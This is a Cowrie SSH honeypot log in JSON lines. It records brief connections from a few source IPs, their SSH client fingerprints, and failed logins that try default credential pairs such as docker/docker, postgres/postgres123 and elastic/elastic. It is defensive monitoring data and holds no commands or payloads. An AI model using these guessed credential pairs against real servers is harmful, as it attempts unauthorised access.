{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:45.408253Z","src_ip":"83.168.105.65","session":"bddeab4e54bd"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:45.518123Z","src_ip":"83.168.105.65","session":"bddeab4e54bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e46783eb5c3e","protocol":"ssh","message":"New connection: 212.227.125.160:40088 (1.2.3.4:22) [session: e46783eb5c3e]","sensor":"my-vps","timestamp":"2025-08-26T11:45:46.554398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:46.556096Z","src_ip":"212.227.125.160","session":"e46783eb5c3e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:46.557540Z","src_ip":"83.168.105.65","session":"bddeab4e54bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:46.605290Z","src_ip":"212.227.125.160","session":"e46783eb5c3e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:46.803127Z","src_ip":"212.227.125.160","session":"e46783eb5c3e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:48.140865Z","src_ip":"212.227.125.160","session":"e46783eb5c3e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37396,"dst_ip":"1.2.3.4","dst_port":22,"session":"99200d564804","protocol":"ssh","message":"New connection: 196.251.86.249:37396 (1.2.3.4:22) [session: 99200d564804]","sensor":"my-vps","timestamp":"2025-08-26T11:45:49.530912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:50.157182Z","src_ip":"196.251.86.249","session":"99200d564804"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:45:50.158375Z","src_ip":"196.251.86.249","session":"99200d564804"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40858,"dst_ip":"1.2.3.4","dst_port":22,"session":"8742ec02e80f","protocol":"ssh","message":"New connection: 212.227.125.160:40858 (1.2.3.4:22) [session: 8742ec02e80f]","sensor":"my-vps","timestamp":"2025-08-26T11:45:52.429942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:52.430989Z","src_ip":"212.227.125.160","session":"8742ec02e80f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:52.492127Z","src_ip":"212.227.125.160","session":"8742ec02e80f"}
{"eventid":"cowrie.login.failed","username":"git","password":"test123","message":"login attempt [git/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:52.838043Z","src_ip":"196.251.86.249","session":"99200d564804"}
{"eventid":"cowrie.login.failed","username":"uucp","password":"uucp","message":"login attempt [uucp/uucp] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:53.531678Z","src_ip":"212.227.125.160","session":"8742ec02e80f"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:54.386700Z","src_ip":"196.251.86.249","session":"99200d564804"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:54.599355Z","src_ip":"212.227.125.160","session":"8742ec02e80f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41624,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bf91a0f5afe","protocol":"ssh","message":"New connection: 212.227.125.160:41624 (1.2.3.4:22) [session: 3bf91a0f5afe]","sensor":"my-vps","timestamp":"2025-08-26T11:45:58.893998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:58.895002Z","src_ip":"212.227.125.160","session":"3bf91a0f5afe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:58.954335Z","src_ip":"212.227.125.160","session":"3bf91a0f5afe"}
{"eventid":"cowrie.login.failed","username":"unl0","password":"unl0","message":"login attempt [unl0/unl0] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:59.120308Z","src_ip":"212.227.125.160","session":"3bf91a0f5afe"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:00.174766Z","src_ip":"212.227.125.160","session":"3bf91a0f5afe"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60618,"dst_ip":"1.2.3.4","dst_port":22,"session":"23f295033e77","protocol":"ssh","message":"New connection: 83.168.105.65:60618 (1.2.3.4:22) [session: 23f295033e77]","sensor":"my-vps","timestamp":"2025-08-26T11:46:00.748189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:00.749157Z","src_ip":"83.168.105.65","session":"23f295033e77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:00.789677Z","src_ip":"83.168.105.65","session":"23f295033e77"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:00.913137Z","src_ip":"83.168.105.65","session":"23f295033e77"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:01.957221Z","src_ip":"83.168.105.65","session":"23f295033e77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42366,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a9df355305","protocol":"ssh","message":"New connection: 212.227.125.160:42366 (1.2.3.4:22) [session: f0a9df355305]","sensor":"my-vps","timestamp":"2025-08-26T11:46:04.860801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:04.959000Z","src_ip":"212.227.125.160","session":"f0a9df355305"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:04.959747Z","src_ip":"212.227.125.160","session":"f0a9df355305"}
{"eventid":"cowrie.login.failed","username":"main","password":"main","message":"login attempt [main/main] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:05.273400Z","src_ip":"212.227.125.160","session":"f0a9df355305"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:06.339972Z","src_ip":"212.227.125.160","session":"f0a9df355305"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43158,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff0eef95e9e7","protocol":"ssh","message":"New connection: 212.227.125.160:43158 (1.2.3.4:22) [session: ff0eef95e9e7]","sensor":"my-vps","timestamp":"2025-08-26T11:46:10.679045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:10.688094Z","src_ip":"212.227.125.160","session":"ff0eef95e9e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:10.754828Z","src_ip":"212.227.125.160","session":"ff0eef95e9e7"}
{"eventid":"cowrie.login.failed","username":"list","password":"list","message":"login attempt [list/list] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:10.986018Z","src_ip":"212.227.125.160","session":"ff0eef95e9e7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:12.350941Z","src_ip":"212.227.125.160","session":"ff0eef95e9e7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35546,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca43fe9490e8","protocol":"ssh","message":"New connection: 83.168.105.65:35546 (1.2.3.4:22) [session: ca43fe9490e8]","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.118310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.119431Z","src_ip":"83.168.105.65","session":"ca43fe9490e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.158759Z","src_ip":"83.168.105.65","session":"ca43fe9490e8"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.278870Z","src_ip":"83.168.105.65","session":"ca43fe9490e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43934,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cdf012cd6f3","protocol":"ssh","message":"New connection: 212.227.125.160:43934 (1.2.3.4:22) [session: 8cdf012cd6f3]","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.725562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.784934Z","src_ip":"212.227.125.160","session":"8cdf012cd6f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:16.785810Z","src_ip":"212.227.125.160","session":"8cdf012cd6f3"}
{"eventid":"cowrie.login.failed","username":"splunk","password":"splunk","message":"login attempt [splunk/splunk] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:17.057893Z","src_ip":"212.227.125.160","session":"8cdf012cd6f3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:17.319847Z","src_ip":"83.168.105.65","session":"ca43fe9490e8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:18.120871Z","src_ip":"212.227.125.160","session":"8cdf012cd6f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44704,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce6169a1abfc","protocol":"ssh","message":"New connection: 212.227.125.160:44704 (1.2.3.4:22) [session: ce6169a1abfc]","sensor":"my-vps","timestamp":"2025-08-26T11:46:21.970428Z"}
